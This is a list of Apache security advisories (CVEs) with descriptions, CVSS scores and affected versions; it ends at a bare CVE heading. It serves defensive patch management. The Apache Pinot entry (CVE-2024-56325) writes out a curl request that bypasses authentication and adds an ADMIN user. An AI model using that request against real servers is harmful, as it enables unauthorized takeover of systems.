Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 3.9 2.5

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 11.0.0
CVE-2024-52318

Incorrect object recycling and reuse vulnerability in Apache Tomcat. This issue affects Apache Tomcat: 11.0.0, 10.1.31, 9.0.96. Users are recommended to upgrade to version 11.0.1, 10.1.32 or 9.0.97, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache tomcat 11.0.0
apache tomcat 9.0.96
apache tomcat 10.1.31
CVE-2024-52338

Deserialization of untrusted data in IPC and Parquet readers in the Apache Arrow R package versions 4.0.0 through 16.1.0 allows arbitrary code execution. An application is vulnerable if it reads Arrow IPC, Feather or Parquet data from untrusted sources (for example, user-supplied input files). This vulnerability only affects the arrow R package, not other Apache Arrow implementations or bindings unless those bindings are specifically used via the R package (for example, an R application that embeds a Python interpreter and uses PyArrow to read files from untrusted sources is still vulnerable if the arrow R package is an affected version). It is recommended that users of the arrow R package upgrade to 17.0.0 or later. Similarly, it is recommended that downstream libraries upgrade their dependency requirements to arrow 17.0.0 or later. If using an affected version of the package, untrusted data can read into a Table and its internal to_data_frame() method can be used as a workaround (e.g., read_parquet(..., as_data_frame = FALSE)$to_data_frame()). This issue affects the Apache Arrow R package: from 4.0.0 through 16.1.0. Users are recommended to upgrade to version 17.0.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache arrow *
CVE-2024-52577

In Apache Ignite versions from 2.6.0 and before 2.17.0, configured Class Serialization Filters are ignored for some Ignite endpoints. The vulnerability could be exploited if an attacker manually crafts an Ignite message containing a vulnerable object whose class is present in the Ignite server classpath and sends it to Ignite server endpoints. Deserialization of such a message by the Ignite server may result in the execution of arbitrary code on the Apache Ignite server side.

Products Affected

Vendor Product Version
apache ignite *
CVE-2024-53299

The request handling in the core in Apache Wicket 7.0.0 on any platform allows an attacker to create a DOS via multiple requests to server resources. Users are recommended to upgrade to versions 9.19.0 or 10.3.0, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 2.8 3.6

Products Affected

Vendor Product Version
apache wicket *
CVE-2024-53677

File upload logic in Apache Struts is flawed. An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution. This issue affects Apache Struts: from 2.0.0 before 6.4.0. Users are recommended to upgrade to version 6.4.0 at least and migrate to the new file upload mechanism https://struts.apache.org/core-developers/file-upload . If you are not using an old file upload logic based on FileuploadInterceptor your application is safe. You can find more details in  https://cwiki.apache.org/confluence/display/WW/S2-067

Products Affected

Vendor Product Version
apache struts *
CVE-2024-53678

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache VCL. Users can modify form data submitted when requesting a new Block Allocation such that a SELECT SQL statement is modified. The data returned by the SELECT statement is not viewable by the attacker. This issue affects all versions of Apache VCL from 2.2 through 2.5.1. Users are recommended to upgrade to version 2.5.2, which fixes the issue.

Products Affected

Vendor Product Version
apache vcl *
CVE-2024-53679

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache VCL in the User Lookup form. A user with sufficient rights to be able to view this part of the site can craft a URL or be tricked in to clicking a URL that will give a specified user elevated rights. This issue affects all versions of Apache VCL through 2.5.1. Users are recommended to upgrade to version 2.5.2, which fixes the issue.

Products Affected

Vendor Product Version
apache vcl *
CVE-2024-53868

Apache Traffic Server allows request smuggling if chunked messages are malformed.  This issue affects Apache Traffic Server: from 9.2.0 through 9.2.9, from 10.0.0 through 10.0.4. Users are recommended to upgrade to version 9.2.10 or 10.0.5, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2024-53947

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Superset. Specifically, certain engine-specific functions are not checked, which allows attackers to bypass Apache Superset's SQL authorization. This issue is a follow-up to CVE-2024-39887 with additional disallowed PostgreSQL functions now included: query_to_xml_and_xmlschema, table_to_xml, table_to_xml_and_xmlschema. This issue affects Apache Superset: <4.1.0. Users are recommended to upgrade to version 4.1.0, which fixes the issue or add these Postgres functions to the config set DISALLOWED_SQL_FUNCTIONS.

Products Affected

Vendor Product Version
apache superset *
CVE-2024-53948

Generation of Error Message Containing analytics metadata Information in Apache Superset. This issue affects Apache Superset: before 4.1.0. Users are recommended to upgrade to version 4.1.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2024-53949

Improper Authorization vulnerability in Apache Superset when FAB_ADD_SECURITY_API is enabled (disabled by default). Allows for lower privilege users to use this API.  issue affects Apache Superset: from 2.0.0 before 4.1.0. Users are recommended to upgrade to version 4.1.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache superset *
CVE-2024-54676

Vendor: The Apache Software Foundation Versions Affected: Apache OpenMeetings from 2.1.0 before 8.0.0 Description: Default clustering instructions at https://openmeetings.apache.org/Clustering.html  doesn't specify white/black lists for OpenJPA this leads to possible deserialisation of untrusted data. Users are recommended to upgrade to version 8.0.0 and update their startup scripts to include the relevant 'openjpa.serialization.class.blacklist' and 'openjpa.serialization.class.whitelist' configurations as shown in the documentation.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache openmeetings *
CVE-2024-54677

Uncontrolled Resource Consumption vulnerability in the examples web application provided with Apache Tomcat leads to denial of service. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.1, from 10.1.0-M1 through 10.1.33, from 9.0.0.M1 through 9.9.97. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 though 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.2, 10.1.34 or 9.0.98, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L 3.9 1.4

Products Affected

Vendor Product Version
apache tomcat *
netapp bootstrap_os -
CVE-2024-55532

Improper Neutralization of Formula Elements in Export CSV feature of Apache Ranger in Apache Ranger Version < 2.6.0. Users are recommended to upgrade to version 2.6.0, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache ranger *
CVE-2024-55633

Improper Authorization vulnerability in Apache Superset. On Postgres analytic databases an attacker with SQLLab access can craft a specially designed SQL DML statement that is Incorrectly identified as a read-only query, enabling its execution. Non postgres analytics database connections and postgres analytics database connections set with a readonly user (advised) are not vulnerable.  This issue affects Apache Superset: before 4.1.0. Users are recommended to upgrade to version 4.1.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache superset *
CVE-2024-56128

Incorrect Implementation of Authentication Algorithm in Apache Kafka's SCRAM implementation. Issue Summary: Apache Kafka's implementation of the Salted Challenge Response Authentication Mechanism (SCRAM) did not fully adhere to the requirements of RFC 5802 [1]. Specifically, as per RFC 5802, the server must verify that the nonce sent by the client in the second message matches the nonce sent by the server in its first message. However, Kafka's SCRAM implementation did not perform this validation. Impact: This vulnerability is exploitable only when an attacker has plaintext access to the SCRAM authentication exchange. However, the usage of SCRAM over plaintext is strongly discouraged as it is considered an insecure practice [2]. Apache Kafka recommends deploying SCRAM exclusively with TLS encryption to protect SCRAM exchanges from interception [3]. Deployments using SCRAM with TLS are not affected by this issue. How to Detect If You Are Impacted: If your deployment uses SCRAM authentication over plaintext communication channels (without TLS encryption), you are likely impacted. To check if TLS is enabled, review your server.properties configuration file for listeners property. If you have SASL_PLAINTEXT in the listeners, then you are likely impacted. Fix Details: The issue has been addressed by introducing nonce verification in the final message of the SCRAM authentication exchange to ensure compliance with RFC 5802. Affected Versions: Apache Kafka versions 0.10.2.0 through 3.9.0, excluding the fixed versions below. Fixed Versions: 3.9.0 3.8.1 3.7.2 Users are advised to upgrade to 3.7.2 or later to mitigate this issue. Recommendations for Mitigation: Users unable to upgrade to the fixed versions can mitigate the issue by: - Using TLS with SCRAM Authentication: Always deploy SCRAM over TLS to encrypt authentication exchanges and protect against interception. - Considering Alternative Authentication Mechanisms: Evaluate alternative authentication mechanisms, such as PLAIN, Kerberos or OAuth with TLS, which provide additional layers of security.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache kafka *
apache kafka 3.8.0
CVE-2024-56180

CWE-502 Deserialization of Untrusted Data at the eventmesh-meta-raft plugin module in Apache EventMesh master branch without release version on windows\linux\mac os e.g. platforms allows attackers to send controlled message and remote code execute via hessian deserialization rpc protocol. Users can use the code under the master branch in project repo or version 1.11.0 to fix this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache eventmesh *
CVE-2024-56195

Improper Access Control vulnerability in Apache Traffic Server. This issue affects Apache Traffic Server: from 9.2.0 through 9.2.8, from 10.0.0 through 10.0.3. Users are recommended to upgrade to version 9.2.9 or 10.0.4, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L 2.8 3.4

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2024-56196

Improper Access Control vulnerability in Apache Traffic Server. This issue affects Apache Traffic Server: from 10.0.0 through 10.0.3. Users are recommended to upgrade to version 10.0.4, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L 2.8 3.4

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2024-56202

Expected Behavior Violation vulnerability in Apache Traffic Server. This issue affects Apache Traffic Server: from 9.0.0 through 9.2.8, from 10.0.0 through 10.0.3. Users are recommended to upgrade to versions 9.2.9 or 10.0.4 or newer, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L 2.8 1.4

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2024-56325

Authentication Bypass Issue If the path does not contain / and contain., authentication is not required. Expected Normal Request and Response Example curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users Return: {"code":401,"error":"HTTP 401 Unauthorized"} Malicious Request and Response Example curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; . Return: {"users":{}} A new user gets added bypassing authentication, enabling the user to control Pinot.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache pinot *
CVE-2024-56337

Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.1, from 10.1.0-M1 through 10.1.33, from 9.0.0.M1 through 9.0.97. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 though 8.5.100. Other, older, EOL versions may also be affected. The mitigation for CVE-2024-50379 was incomplete. Users running Tomcat on a case insensitive file system with the default servlet write enabled (readonly initialisation parameter set to the non-default value of false) may need additional configuration to fully mitigate CVE-2024-50379 depending on which version of Java they are using with Tomcat: - running on Java 8 or Java 11: the system property sun.io.useCanonCaches must be explicitly set to false (it defaults to true) - running on Java 17: the system property sun.io.useCanonCaches, if set, must be set to false (it defaults to false) - running on Java 21 onwards: no further configuration is required (the system property and the problematic cache have been removed) Tomcat 11.0.3, 10.1.35 and 9.0.99 onwards will include checks that sun.io.useCanonCaches is set appropriately before allowing the default servlet to be write enabled on a case insensitive file system. Tomcat will also set sun.io.useCanonCaches to false by default where it can.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache tomcat *
netapp bootstrap_os -
CVE-2024-56373

DAG Author (who already has quite a lot of permissions) could manipulate database of Airflow 2 in the way to execute arbitrary code in the web-server context, which they should normally not be able to do, leading to potentially remote code execution in the context of web-server (server-side) as a result of a user viewing historical task information. The functionality responsible for that (log template history) has been disabled by default in 2.11.1 and users should upgrade to Airflow 3 if they want to continue to use log template history. They can also manually modify historical log file names if they want to see historical logs that were generated before the last log template change.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.4 HIGH CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H 1.7 6.0

Products Affected

Vendor Product Version
apache airflow *
CVE-2024-56512

Apache NiFi 1.10.0 through 2.0.0 are missing fine-grained authorization checking for Parameter Contexts, referenced Controller Services, and referenced Parameter Providers, when creating new Process Groups. Creating a new Process Group can include binding to a Parameter Context, but in cases where the Process Group did not reference any Parameter values, the framework did not check user authorization for the bound Parameter Context. Missing authorization for a bound Parameter Context enabled clients to download non-sensitive Parameter values after creating the Process Group. Creating a new Process Group can also include referencing existing Controller Services or Parameter Providers. The framework did not check user authorization for referenced Controller Services or Parameter Providers, enabling clients to create Process Groups and use these components that were otherwise unauthorized. This vulnerability is limited in scope to authenticated users authorized to create Process Groups. The scope is further limited to deployments with component-based authorization policies. Upgrading to Apache NiFi 2.1.0 is the recommended mitigation, which includes authorization checking for Parameter and Controller Service references on Process Group creation.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N 2.8 2.5

Products Affected

Vendor Product Version
apache nifi *
CVE-2024-56736

Server-Side Request Forgery (SSRF) vulnerability in Apache HertzBeat. This issue affects Apache HertzBeat (incubating): before 1.7.0. Users are recommended to upgrade to version 1.7.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache hertzbeat *
CVE-2025-22828

CloudStack users can add and read comments (annotations) on resources they are authorised to access.  Due to an access validation issue that affects Apache CloudStack versions from 4.16.0, users who have access, prior access or knowledge of resource UUIDs can list and add comments (annotations) to such resources.  An attacker with a user-account and access or prior knowledge of resource UUIDs may exploit this issue to read contents of the comments (annotations) or add malicious comments (annotations) to such resources.  This may cause potential loss of confidentiality of CloudStack environments and resources if the comments (annotations) contain any privileged information. However, guessing or brute-forcing resource UUIDs are generally hard to impossible and access to listing or adding comments isn't same as access to CloudStack resources, making this issue of very low severity and general low impact. CloudStack admins may also disallow listAnnotations and addAnnotation API access to non-admin roles in their environment as an interim measure.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2025-22829

The CloudStack Quota plugin has an improper privilege management logic in version 4.20.0.0. Anyone with authenticated user-account access in CloudStack 4.20.0.0 environments, where this plugin is enabled and have access to specific APIs can enable or disable reception of quota-related emails for any account in the environment and list their configurations. Quota plugin users using CloudStack 4.20.0.0 are recommended to upgrade to CloudStack version 4.20.1.0, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache cloudstack 4.20.0.0
CVE-2025-23015

Privilege Defined With Unsafe Actions vulnerability in Apache Cassandra. An user with MODIFY permission ON ALL KEYSPACES can escalate privileges to superuser within a targeted Cassandra cluster via unsafe actions to a system resource. Operators granting data MODIFY permission on all keyspaces on affected versions should review data access rules for potential breaches. This issue affects Apache Cassandra through 3.0.30, 3.11.17, 4.0.15, 4.1.7, 5.0.2. Users are recommended to upgrade to versions 3.0.31, 3.11.18, 4.0.16, 4.1.8, 5.0.3, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache cassandra *
CVE-2025-23048

In some mod_ssl configurations on Apache HTTP Server 2.4.35 through to 2.4.63, an access control bypass by trusted clients is possible using TLS 1.3 session resumption. Configurations are affected when mod_ssl is configured for multiple virtual hosts, with each restricted to a different set of trusted client certificates (for example with a different SSLCACertificateFile/Path setting). In such a case, a client trusted to access one virtual host may be able to access another virtual host, if SSLStrictSNIVHostCheck is not enabled in either virtual host.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

Products Affected

Vendor Product Version
apache http_server *
CVE-2025-23184

A potential denial of service vulnerability is present in versions of Apache CXF before 3.5.10, 3.6.5 and 4.0.6. In some edge cases, the CachedOutputStream instances may not be closed and, if backed by temporary files, may fill up the file system (it applies to servers and clients).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6
security@apache.org 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H 2.2 3.6

Products Affected

Vendor Product Version
apache cxf *
CVE-2025-23195

An XML External Entity (XXE) vulnerability exists in the Ambari/Oozie project, allowing an attacker to inject malicious XML entities. This vulnerability occurs due to insecure parsing of XML input using the `DocumentBuilderFactory` class without disabling external entity resolution. An attacker can exploit this vulnerability to read arbitrary files on the server or perform server-side request forgery (SSRF) attacks. The issue has been fixed in both Ambari 2.7.9 and the trunk branch.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache ambari *
CVE-2025-23196

A code injection vulnerability exists in the Ambari Alert Definition feature, allowing authenticated users to inject and execute arbitrary shell commands. The vulnerability arises when defining alert scripts, where the script filename field is executed using `sh -c`. An attacker with authenticated access can exploit this vulnerability to inject malicious commands, leading to remote code execution on the server. The issue has been fixed in the latest versions of Ambari.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache ambari *
CVE-2025-23408

Weak Password Requirements vulnerability in Apache Fineract. This issue affects Apache Fineract: through 1.10.1. The issue is fixed in version 1.11.0. Users are encouraged to upgrade to version 1.13.0, the latest release.

Products Affected

Vendor Product Version
apache fineract *
CVE-2025-24404

XML Injection RCE by parse http sitemap xml response vulnerability in Apache HertzBeat. The attacker needs to have an authenticated account with access, and add monitor parsed by xml, returned special content can trigger the XML parsing vulnerability. This issue affects Apache HertzBeat (incubating): before 1.7.0. Users are recommended to upgrade to version 1.7.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache hertzbeat *
CVE-2025-24783

** UNSUPPORTED WHEN ASSIGNED ** Incorrect Usage of Seeds in Pseudo-Random Number Generator (PRNG) vulnerability in Apache Cocoon. This issue affects Apache Cocoon: all versions. When a continuation is created, it gets a random identifier. Because the random number generator used to generate these identifiers was seeded with the startup time, it may not have been sufficiently unpredictable, and an attacker could use this to guess continuation ids and look up continuations they should not have had access to. As a mitigation, you may enable the "session-bound-continuations" option to make sure continuations are not shared across sessions. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache cocoon *
CVE-2025-24813

Path Equivalence: 'file.Name' (Internal Dot) leading to Remote Code Execution and/or Information disclosure and/or malicious content added to uploaded files via write enabled Default Servlet in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.2, from 10.1.0-M1 through 10.1.34, from 9.0.0.M1 through 9.0.98. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 though 8.5.100. Other, older, EOL versions may also be affected. If all of the following were true, a malicious user was able to view security sensitive files and/or inject content into those files: - writes enabled for the default servlet (disabled by default) - support for partial PUT (enabled by default) - a target URL for security sensitive uploads that was a sub-directory of a target URL for public uploads - attacker knowledge of the names of security sensitive files being uploaded - the security sensitive files also being uploaded via partial PUT If all of the following were true, a malicious user was able to perform remote code execution: - writes enabled for the default servlet (disabled by default) - support for partial PUT (enabled by default) - application was using Tomcat's file based session persistence with the default storage location - application included a library that may be leveraged in a deserialization attack Users are recommended to upgrade to version 11.0.3, 10.1.35 or 9.0.99, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 10.1.0
apache tomcat 11.0.0
apache tomcat 9.0.0
netapp bootstrap_os -
debian debian_linux 11.0
CVE-2025-24814

Core creation allows users to replace "trusted" configset files with arbitrary configuration Solr instances that (1) use the "FileSystemConfigSetService" component (the default in "standalone" or "user-managed" mode), and (2) are running without authentication and authorization are vulnerable to a sort of privilege escalation wherein individual "trusted" configset files can be ignored in favor of potentially-untrusted replacements available elsewhere on the filesystem.  These replacement config files are treated as "trusted" and can use "<lib>" tags to add to Solr's classpath, which an attacker might use to load malicious code as a searchComponent or other plugin. This issue affects all Apache Solr versions up through Solr 9.7.  Users can protect against the vulnerability by enabling authentication and authorization on their Solr clusters or switching to SolrCloud (and away from "FileSystemConfigSetService").  Users are also recommended to upgrade to Solr 9.8.0, which mitigates this issue by disabling use of "<lib>" tags by default.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N 2.8 2.5

Products Affected

Vendor Product Version
apache solr *
CVE-2025-24853

A carefully crafted request when creating a header link using the wiki markup syntax, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim. Further research by the JSPWiki team showed that the markdown parser allowed this kind of attack too. Apache JSPWiki users should upgrade to 2.12.3 or later.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache jspwiki *
CVE-2025-24854

A carefully crafted request using the Image plugin could trigger an XSS vulnerability on Apache JSPWiki, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim. Apache JSPWiki users should upgrade to 2.12.3 or later.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache jspwiki *
CVE-2025-24859

A session management vulnerability exists in Apache Roller before version 6.1.5 where active user sessions are not properly invalidated after password changes. When a user's password is changed, either by the user themselves or by an administrator, existing sessions remain active and usable. This allows continued access to the application through old sessions even after password changes, potentially enabling unauthorized access if credentials were compromised. This issue affects Apache Roller versions up to and including 6.1.4. The vulnerability is fixed in Apache Roller 6.1.5 by implementing centralized session management that properly invalidates all active sessions when passwords are changed or users are disabled.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache roller *
CVE-2025-24860

Incorrect Authorization vulnerability in Apache Cassandra allowing users to access a datacenter or IP/CIDR groups they should not be able to when using CassandraNetworkAuthorizer or CassandraCIDRAuthorizer. Users with restricted data center access can update their own permissions via data control language (DCL) statements on affected versions. This issue affects Apache Cassandra: from 4.0.0 through 4.0.15 and from 4.1.0 through 4.1.7 for CassandraNetworkAuthorizer, and from 5.0.0 through 5.0.2 for both CassandraNetworkAuthorizer and CassandraCIDRAuthorizer. Operators using CassandraNetworkAuthorizer or CassandraCIDRAuthorizer on affected versions should review data access rules for potential breaches. Users are recommended to upgrade to versions 4.0.16, 4.1.8, 5.0.3, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N 2.8 2.5

Products Affected

Vendor Product Version
apache cassandra *
CVE-2025-25069

A Cross-Protocol Scripting vulnerability is found in Apache Kvrocks. Since Kvrocks didn't detect if "Host:" or "POST" appears in RESP requests, a valid HTTP request can also be sent to Kvrocks as a valid RESP request and trigger some database operations, which can be dangerous when it is chained with SSRF. It is similiar to CVE-2016-10517 in Redis. This issue affects Apache Kvrocks: from the initial version to the latest version 2.11.0. Users are recommended to upgrade to version 2.11.1, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 3.9 2.5

Products Affected

Vendor Product Version
apache kvrocks *
CVE-2025-25247

